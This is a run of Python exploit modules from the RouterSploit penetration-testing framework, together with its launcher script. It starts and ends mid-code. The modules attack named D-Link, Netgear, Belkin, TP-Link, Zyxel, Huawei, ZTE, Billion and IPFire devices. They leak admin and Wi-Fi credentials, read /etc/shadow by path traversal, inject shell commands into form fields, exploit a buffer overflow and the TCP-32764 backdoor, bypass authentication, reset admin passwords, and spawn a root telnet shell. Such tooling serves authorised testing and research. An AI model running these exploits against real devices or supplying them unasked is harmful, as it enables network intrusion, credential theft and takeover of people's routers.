        injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)

        headers = {
            self.header: injection,
        }

        response = self.http_request(
            method=self.method,
            path=self.path,
            headers=headers
        )

        if response is None:
            return

        regexp = "{}(.+?){}".format(marker, marker)
        res = re.findall(regexp, response.text, re.DOTALL)

        if len(res):
            return res[0]
        else:
            return ""

    @mute
    def check(self):
        number = int(utils.random_text(6, alph=string.digits))
        solution = number - 1
        cmd = "echo $(({}-1))".format(number)

        marker = utils.random_text(32)
        for payload in self.payloads:
            injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)

            headers = {
                self.header: injection,
            }

            response = self.http_request(
                method=self.method,
                path=self.path,
                headers=headers
            )
            if response is None:
                continue

            if str(solution) in response.text:
                self.valid = payload
                return True  # target is vulnerable

        return False  # target not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Asmax AR1004G Password Disclosure",
        "description": "Exploits Asmax AR1004G Password Disclosure vulnerability that allows to "
                       "fetch credentials for: Admin, Support and User accounts.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt",
        ),
        "devices": (
            "Asmax AR 1004g",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        creds = []

        print_status("Requesting {}".format(self.get_target_url()))
        response = self.http_request(
            method="GET",
            path="/password.cgi",
        )
        if response is None:
            print_error("Exploit failed - empty response")
            return

        tokens = [
            ("admin", r"pwdAdmin = '(.+?)'"),
            ("support", r"pwdSupport = '(.+?)'"),
            ("user", r"pwdUser = '(.+?)'")
        ]

        print_status("Trying to extract credentials")
        for token in tokens:
            res = re.findall(token[1], response.text)
            if res:
                creds.append((token[0], res[0]))

        if creds:
            print_success("Credentials found")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Exploit failed - credentials could not be found")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/password.cgi"
        )

        if response is None:
            return False  # target is not vulnerable

        if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
            return True  # target vulnerable

        return False  # target not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Belkin N150 Path Traversal",
        "description": "Module exploits Belkin N150 Path Traversal vulnerability "
                       "which allows to read any file on the system.",
        "authors": (
            "Aditya Lad",  # vulnerability discovery
            "Rahul Pratap Singh",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/38488/",
            "http://www.belkin.com/us/support-article?articleNum=109400",
            "http://www.kb.cert.org/vuls/id/774788",
        ),
        "devices": (
            "Belkin N150 1.00.07",
            "Belkin N150 1.00.08",
            "Belkin N150 1.00.09",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/shadow", "File to read from filesystem")

    def run(self):
        if self.check():
            path = "/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.filename)

            response = self.http_request(
                method="GET",
                path=path,
            )
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Success! File: %s" % self.filename)
                print_info(response.text)
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo",
        )

        if response and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "TP-Link WDR740ND & WDR740N Path Traversal",
        "description": "Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability"
                       "that allowsto read files from the filesystem.",
        "authors": (
            "websec.ca",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal",
        ),
        "devices": (
            "TP-Link WDR740ND",
            "TP-Link WDR740N",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/shadow", "File to read from the filesystem")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            path = "/help/../../../../../../../../../../../../../../../..{}".format(self.filename)

            print_status("Sending payload request")
            response = self.http_request(
                method="GET",
                path=path
            )
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                pos = response.text.find("//--></SCRIPT>") + 15
                res = response.text[pos:]

                if len(res):
                    print_status("Reading file {}".format(self.filename))
                    print_info(res)
                else:
                    print_error("Could not read file {}".format(self.filename))

        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        path = "/help/../../../../../../../../../../../../../../../../etc/shadow"

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return False  # target is not vulnerable

        if utils.detect_file_content(response.text, "/etc/shadow"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "ZTE ZXHN H108N Wifi Password Disclosure",
        "description": "Module exploits ZTE ZXHN H108N WiFi Password Disclosure vulnerability "
                       "that allows to retrieve password for wifi connection.",
        "authors": (
            "Mostafa Nafady",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/threat9/routersploit/issues/588",
        ),
        "devices": (
            "ZTE ZXHN H108N",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        credentials = self.get_credentials()
        if credentials:
            print_success("Target is vulnerable")

            ssid, password = credentials
            creds = [
                ("SSID Name", ssid),
                ("Password", password)
            ]

            print_status("Discovered information:")
            print_table(("Parameter", "Value"), *creds)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def get_credentials(self):
        response = self.http_request(
            method="GET",
            path="/wizard_wlan_t.gch"
        )

        if response:
            # get ssid
            ssid = ""
            password = ""

            res = [r for r in re.findall(r"Transfer_meaning\('ESSID','(.*?)'\);", response.text) if r]
            if res:
                ssid = res[0]

            # get password
            res = [r for r in re.findall(r"Transfer_meaning\('KeyPassphrase','(.*?)'\);", response.text) if r]
            if res:
                password = res[0]

            if ssid or password:
                return (ssid, password)

        return None

    @mute
    def check(self):
        credentials = self.get_credentials()
        if credentials:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DSL-2750B Info Disclosure",
        "description": "Module explois information disclosure vulnerability in D-Link DSL-2750B devices. "
                       "It is possible to retrieve sensitive information such as SSID, Wi-Fi password, PIN code.",
        "authors": (
            "Alvaro Folgado",  # vulnerability discovery
            "Jose Rodriguez",  # vulnerability discovery
            "Ivan Sanz",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module,
        ),
        "references": (
            "http://seclists.org/fulldisclosure/2015/May/129",
        ),
        "devices": (
            "D-Link DSL-2750B EU_1.01",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/hidden_info.html"
        )
        if response is None:
            return

        creds = []
        data = ['2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase', 'PIN Code']

        for d in data:
            regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(d)
            val = re.findall(regexp, response.text)

            if len(val):
                creds.append((d, val[0]))

        if len(creds):
            print_success("Credentials found!")
            headers = ("Option", "Value")
            print_table(headers, *creds)
        else:
            print_error("Exploit failed - credentials could not be found")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/hidden_info.html"
        )
        if response is None:
            return False  # target is not vulnerable

        if all(map(lambda x: x in response.text, ["SSID", "PassPhrase"])):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import base64
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Zyxel P660HN-T v2 RCE",
        "description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T V2 devices. "
                       "If the target is vulnerable it allows to execute commands on operating system level.",
        "authors": (
            "Pedro Ribeiro <pedrib[at]gmail.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://seclists.org/fulldisclosure/2017/Jan/40",
            "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
            "https://blogs.securiteam.com/index.php/archives/2910",
        ),
        "devices": (
            "Zyxel P660HN-T v2",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString('supervisor', 'Username for the web interface')
    password = OptString('zyad1234', 'Password for the web interface')

    def __init__(self):
        self.session = None

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available. Command length up to 28 characters.")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target seems to be not vulnerable")

    def execute(self, cmd):
        payload = "1.1.1.1`{}`&#".format(cmd)
        data = {
            "logSetting_H": "1",
            "active": "1",
            "logMode": "LocalAndRemote",
            "serverPort": "123",
            "serverIP": payload
        }

        self.http_request(
            method="POST",
            path="/cgi-bin/pages/maintenance/logSetting/logSet.asp",
            data=data,
            session=self.session
        )

        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/js/Multi_Language.js"
        )

        if response is None:
            return False

        if "P-660HN-T1A_IPv6" in response.text:
            return True

        return False

    def login(self):
        credentials = base64.encode("{}:{}".format(self.username, self.password))
        path = "/cgi-bin/index.asp?" + credentials

        data = {
            "Loginuser": "supervisor",
            "Prestige_Login": "Login"
        }

        response = self.http_request(
            method="POST",
            path=path,
            data=data,
            session=self.session
        )

        if response is not None and response.status_code == 200:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.telnet.telnet_client import TelnetClient


class Exploit(HTTPClient, TelnetClient):
    __info__ = {
        "name": "Billion 5200W-T RCE",
        "description": "Module exploits Remote Command Execution vulnerability in Billion 5200W-T devices. "
                       "If the target is vulnerable it allows to execute commands on operating system level.",
        "authors": (
            "Pedro Ribeiro <pedrib[at]gmail.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://seclists.org/fulldisclosure/2017/Jan/40",
            "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
            "https://blogs.securiteam.com/index.php/archives/2910",
        ),
        "devices": (
            "Billion 5200W-T",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    telnet_port = OptPort(9999, "Telnet port used for exploitation")

    username = OptString("admin", "Default username to log in")
    password = OptString("password", "Default password to log in")

    def __init__(self):
        # hardcoded credentials
        self.creds = [
            ("admin", "password"),
            ("true", "true"),
            ("user3", "12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678"),
        ]

    def run(self):
        cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnet_port)

        if self.execute1(cmd) or self.execute2(cmd):
            print_status("Trying to connect to the telnet server...")

            telnet_client = self.telnet_create(port=self.telnet_port)
            if telnet_client.connect():
                telnet_client.interactive()
                telnet_client.close()
            else:
                print_error("Exploit failed - Telnet connection error: {}:{}".format(self.target, self.telnet_port))
        else:
            print_error("Exploit failed")

    def execute1(self, cmd):
        print_status("Trying to exploit first command injection vulnerability...")
        payload = "1.1.1.1;{};#".format(cmd)

        data = {
            "RemotelogEnable": "1",
            "syslogServerAddr": payload,
            "serverPort": "514"
        }

        response = self.http_request(
            method="POST",
            path="/cgi-bin/adv_remotelog.asp",
            data=data,
        )

        if response is not None and response.status_code != 404:
            return True

        print_error("Exploitation failed for unauthenticated command injection")
        return False

    def execute2(self, cmd):
        print_status("Trying authenticated commad injection vulnerability...")

        # Iterate through hardcoded credentials and these provided by the user
        for creds in set(self.creds + [(self.username, self.password)]):
            print_status("Trying exploitation with creds: {}:{}".format(creds[0], creds[1]))
            # Fixate cookie
            cookies = {
                "SESSIONID": utils.random_text(8)
            }

            response = self.http_request(
                method="GET",
                path="/",
                cookies=cookies,
                auth=(creds[0], creds[1]),
            )

            if response is None:
                return False

            payload = "\"%3b{}%26%23".format(cmd)

            data = {
                "SaveTime": "1",
                "uiCurrentTime2": "",
                "uiCurrentTime1": "",
                "ToolsTimeSetFlag": "0",
                "uiRadioValue": "0",
                "uiClearPCSyncFlag": "0",
                "uiwPCdateMonth": "0",
                "uiwPCdateDay": "",
                "&uiwPCdateYear": "",
                "uiwPCdateHour": "",
                "uiwPCdateMinute": "",
                "uiwPCdateSec": "",
                "uiCurTime": "N/A+(NTP+server+is+connecting)",
                "uiTimezoneType": "0",
                "uiViewSyncWith": "0",
                "uiPCdateMonth": "1",
                "uiPCdateDay": "",
                "uiPCdateYear": "",
                "uiPCdateHour": "",
                "uiPCdateMinute": "",
                "uiPCdateSec": "",
                "uiViewdateToolsTZ": "GMT+07:00",
                "uiViewdateDS": "Disable",
                "uiViewSNTPServer": payload,
                "ntp2ServerFlag": "N/A",
                "ntp3ServerFlag": "N/A",
            }

            response = self.http_request(
                method="POST",
                path="/cgi-bin/tools_time.asp",
                cookies=cookies,
                data=data,
                auth=(creds[0], creds[1]),
            )
            if response is None:
                return False

        return True

    @mute
    def check(self):
        # it is not possible to check if the target is vulnerable without exploiting device
        return None



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "IPFire Oinkcode RCE",
        "description": "Module exploits IPFire < 2.19 Core Update 110 Remote Code Execution vulnerability "
                       "which allows executing command on operating system level.",
        "authors": (
            "0x09AL",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/42149/",
        ),
        "devices": (
            "IPFire < 2.19 Core Update 110",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(444, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    username = OptString("admin", "Username to log in with")
    password = OptString("admin", "Password to log in with")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self,
                  architecture="cmd",
                  method="cmd",
                  payload=["awk", "perl", "php", "python"])
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        headers = {
            "Referer": "{}://{}:{}/cgi-bin/ids.cgi".format("https" if self.ssl else "http", self.target, self.port)
        }

        payload = "`{}`".format(cmd)

        data = {
            "ENABLE_SNORT_GREEN": "on",
            "ENABLE_SNORT": "on",
            "RULES": "registered",
            "OINKCODE": payload,
            "ACTION": "Download new ruleset",
            "ACTION2": "snort"
        }

        self.http_request(
            method="POST",
            path="/cgi-bin/ids.cgi",
            headers=headers,
            data=data,
            auth=(self.username, self.password)
        )

        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/cgi-bin/pakfire.cgi",
            auth=(self.username, self.password),
        )

        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200:
            res = re.findall(r"IPFire ([\d.]{4}) \([\w]+\) - Core Update ([\d]+)", response.text)
            if res:
                version = res[0][0]
                update = int(res[0][1])

                if Version(version) <= Version("2.19") and update <= 110:
                    return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Huawei E5331 Info Disclosure",
        "description": "Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot"
                       "devices. If the target is vulnerable it allows to read sensitive information.",
        "authors": (
            "J. Greil https://www.sec-consult.com",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/32161/",
        ),
        "devices": (
            "Huawei E5331 MiFi Mobile Hotspot",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
    port = OptPort(80, "Target HTTP port")

    def __init__(self):
        self.opts = ["WifiAuthmode", "WifiBasicencryptionmodes", "WifiWpaencryptionmodes", "WifiWepKey1", "WifiWepKey2",
                     "WifiWepKey3", "WifiWepKey4", "WifiWepKeyIndex", "WifiWpapsk", "WifiWpsenbl", "WifiWpscfg", "WifiRestart"]

    def run(self):
        response = self.http_request(
            method="GET",
            path="/api/wlan/security-settings",
        )

        if response is None:
            return

        res = []
        for option in self.opts:
            regexp = "<{}>(.+?)</{}>".format(option, option)
            value = re.findall(regexp, response.text)
            if value:
                res.append((option, value[0]))

        if len(res):
            print_success("Found sensitive information!")
            print_table(("Option", "Value"), *res)

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/api/wlan/security-settings",
        )
        if response is None:
            return False  # target is not vulnerable

        res = []
        for option in self.opts:
            regexp = "<{}>(.+?)</{}>".format(option, option)
            value = re.findall(regexp, response.text)
            if value:
                res.append(value)

        if len(res):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Belkin N750 RCE",
        "description": "Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.",
        "authors": (
            "Marco Vaz <mv[at]integrity.pt>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635",
            "https://www.exploit-db.com/exploits/35184/",
            "https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/",
        ),
        "devices": (
            "Belkin N750",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)

        response = self.http_request(
            method="POST",
            path="/login.cgi.php",
            headers=headers,
            data=data,
        )
        if response is None:
            return ""

        return response.text

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass",
        "description": "Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 "
                       "revD devices. It is possible to access administration panel without providing password.",
        "authors": (
            "Craig Heffner",  # vulnerability discovery
            "Karol Celin",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf",
        ),
        "devices": (
            "D-Link DIR-300",
            "D-Link DIR-600",
            "D-Link DIR-615 revD",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_info("\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action.")
            print_info("\nExamples:")
            print_info("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
            print_info("{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port))
        else:
            print_error("Target seems to be not vulnerable")

    @mute
    def check(self):
        # check if it is valid target
        response = self.http_request(
            method="GET",
            path="/bsc_lan.php"
        )
        if response is None:
            return False  # target is not vulnerable

        if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
            return False  # target is not vulnerable

        # checking if authentication can be baypassed
        response = self.http_request(
            method="GET",
            path="/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
        )
        if response is None:
            return False  # target is not vulnerable

        if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import struct
from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient


class Exploit(TCPClient):
    __info__ = {
        "name": "TCP-32764 RCE",
        "description": "Exploits backdoor functionality that allows executing commands "
                       "on operating system level.",
        "authors": (
            "Eloi Vanderbeken",  # vulnerability discovery & proof of concept exploit
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/elvanderb/TCP-32764",
        ),
        "devices": (
            "Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5",
            "Cisco WAP4410N",
            "Cisco WRVS4400N",
            "Cisco WRVS4400N",
            "Diamond DSL642WLG / SerComm IP806Gx v2 TI",
            "LevelOne WBR3460B",
            "Linksys RVS4000 Firmware V1.3.3.5",
            "Linksys WAG120N",
            "Linksys WAG160n v1 and v2",
            "Linksys WAG200G",
            "Linksys WAG320N",
            "Linksys WAG54G2",
            "Linksys WAG54GS",
            "Linksys WRT350N v2 fw 2.00.19",
            "Linksys WRT300N fw 2.00.17",
            "Netgear DG834",
            "Netgear DGN1000",
            "Netgear DGN2000B",
            "Netgear DGN3500",
            "Netgear DGND3300",
            "Netgear DGND3300Bv2 fwv 2.1.00.53_1.00.53GR",
            "Netgear DM111Pv2",
            "Netgear JNR3210",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(32764, "Target TCP port")

    def __init__(self):
        self.endianness = "<"

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        cmd = bytes(cmd, "utf-8")

        # 0x53634d4d - backdoor code
        # 0x07 - exec command
        # length - length of the command to execute
        header = struct.pack(self.endianness + "III", 0x53634D4D, 0x07, len(cmd) + 1)
        payload = header + cmd + b"\x00"

        tcp_client = self.tcp_create()
        if tcp_client.connect():
            tcp_client.send(payload)
            response = tcp_client.recv(0xC)

            sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response)
            response = tcp_client.recv(ret_len)

            tcp_client.close()

            if response:
                return str(response, "utf-8")

        return ""

    @mute
    def check(self):
        tcp_client = self.tcp_create()

        if tcp_client.connect():
            tcp_client.send(b"ABCDE")
            response = tcp_client.recv(5)
            tcp_client.close()

            if response:
                if response.startswith(b"MMcS"):
                    self.endianness = ">"  # BE
                elif response.startswith(b"ScMM"):
                    self.endianness = "<"  # LE

                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear DGN2200 RCE",
        "description": "Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource.",
        "authors": (
            "SivertPL",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/41459/",
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334",
        ),
        "devices": (
            "Netgear DGN2200v1",
            "Netgear DGN2200v2",
            "Netgear DGN2200v3",
            "Netgear DGN2200v4",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Username")
    password = OptString("password", "Password")

    def run(self):
        print_status("It is not possible to check if target is vulnerable")
        print_status("Trying to invoke command loop...")
        print_status("It is blind command injection. Response is not available.")
        shell(self, architecture="mipsbe")

    def execute(self, cmd):
        payload = "www.google.com; {}".format(cmd)
        data = {
            "host_name": payload,
            "lookup": "Lookup"
        }

        self.http_request(
            method="POST",
            path="/dnslookup.cgi",
            data=data,
            auth=(self.username, self.password)
        )
        return ""

    @mute
    def check(self):
        return None  # not possible to check if target is vulnerable



#!/usr/local/bin/python3.13

import logging.handlers
import sys
if sys.version_info.major < 3:
    print("RouterSploit supports only Python3. Rerun application in Python3 environment.")
    exit(0)

from routersploit.interpreter import RoutersploitInterpreter

log_handler = logging.handlers.RotatingFileHandler(filename="routersploit.log", maxBytes=500000)
log_formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s       %(message)s")
log_handler.setFormatter(log_formatter)
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
LOGGER.addHandler(log_handler)


def routersploit(argv):
    rsf = RoutersploitInterpreter()
    if len(argv[1:]):
        rsf.nonInteractive(argv)
    else:
        rsf.start()

if __name__ == "__main__":
    try:
        routersploit(sys.argv)
    except (KeyboardInterrupt, SystemExit):
        pass



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Huawei HG866 Password Change",
        "description": "Module exploits password change vulnerability in Huawei HG866 devices. "
                       "If the target is vulnerable it allows to change administration password.",
        "authors": (
            "hkm",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/19185/",
        ),
        "devices": (
            "Huawei HG866",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    password = OptString('routersploit', 'Password value to change admin account with')

    def run(self):
        if self.check():
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            data = {'psw': self.password,
                    'reenterpsw': self.password,
                    'save': 'Apply'}

            print_status("Sending password change request")
            response = self.http_request(
                method="POST",
                path="/html/password.html",
                headers=headers,
                data=data
            )

            if response.status_code == 200:
                print_success("Administrator's password has been changed to {}".format(self.password))
            else:
                print_error("Exploit failed - could not change password")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/html/password.html"
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "psw" in response.text and "reenterpsw" in response.text:
            return True  # target is vulnerable

        return False  # target not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-850L Creds Disclosure",
        "description": "Module exploits D-Link DIR-850L credentials disclosure vulnerability, "
                       "which allows retrieving administrative credentials.",
        "authors": (
            "Hack2Win",  # vulnerability discovery
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://packetstormsecurity.com/files/145097/dlink-850-admin-creds-retriever.sh.txt",
            "https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dir850l_unauth_exec",
            "https://blogs.securiteam.com/index.php/archives/3364",
        ),
        "devices": (
            "D-Link DIR-850L",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        self.credentials = []

        if self.check():
            print_success("Target seems to be vulnerable")
            print_table(("Username", "Password"), *self.credentials)

        print_error("Target does not seem to be vulnerable")

    @mute
    def check(self):
        headers = {
            "Content-Type": "text/xml",
        }
        cookies = {
            "uid": utils.random_text(8),
        }
        data = (
            "<?xml version =\"1.0\" encoding=\"utf-8\"?>"
            "<postxml>"
            "<module>"
            "<service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>"
            "</module>"
            "</postxml>"
        )
        response = self.http_request(
            method="POST",
            path="/hedwig.cgi",
            data=data,
            headers=headers,
            cookies=cookies
        )

        if response and response.status_code == 200 and "No modules for Hedwig" in response.text:
            pattern = r"<uid>.*</uid>\s*<name>(.*?)</name>\s*<usrid>.*</usrid>\s*<password>(.*?)</password>"
            creds = re.findall(pattern, response.text)
            if creds:
                self.credentials = creds
                return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-300 & DIR-600 RCE",
        "description": "Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability "
                       "which allows executing command on operating system level with root privileges.",
        "authors": (
            "Michael Messner <devnull[at]s3cur1ty.de>",  # vulnerability discovery
            "Marcin Bury <marcin.bury[at]reverse-shell.com>",  # routersploit module
        ),
        "references": (
            "http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
            "http://www.s3cur1ty.de/home-network-horror-days",
            "http://www.s3cur1ty.de/m1adv2013-003",
        ),
        "devices": (
            "D-Link DIR 300",
            "D-Link DIR 600",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        data = "cmd={}".format(cmd)

        response = self.http_request(
            method="POST",
            path="/command.php",
            headers=headers,
            data=data
        )
        if response is None:
            return ""

        return response.text.strip()

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
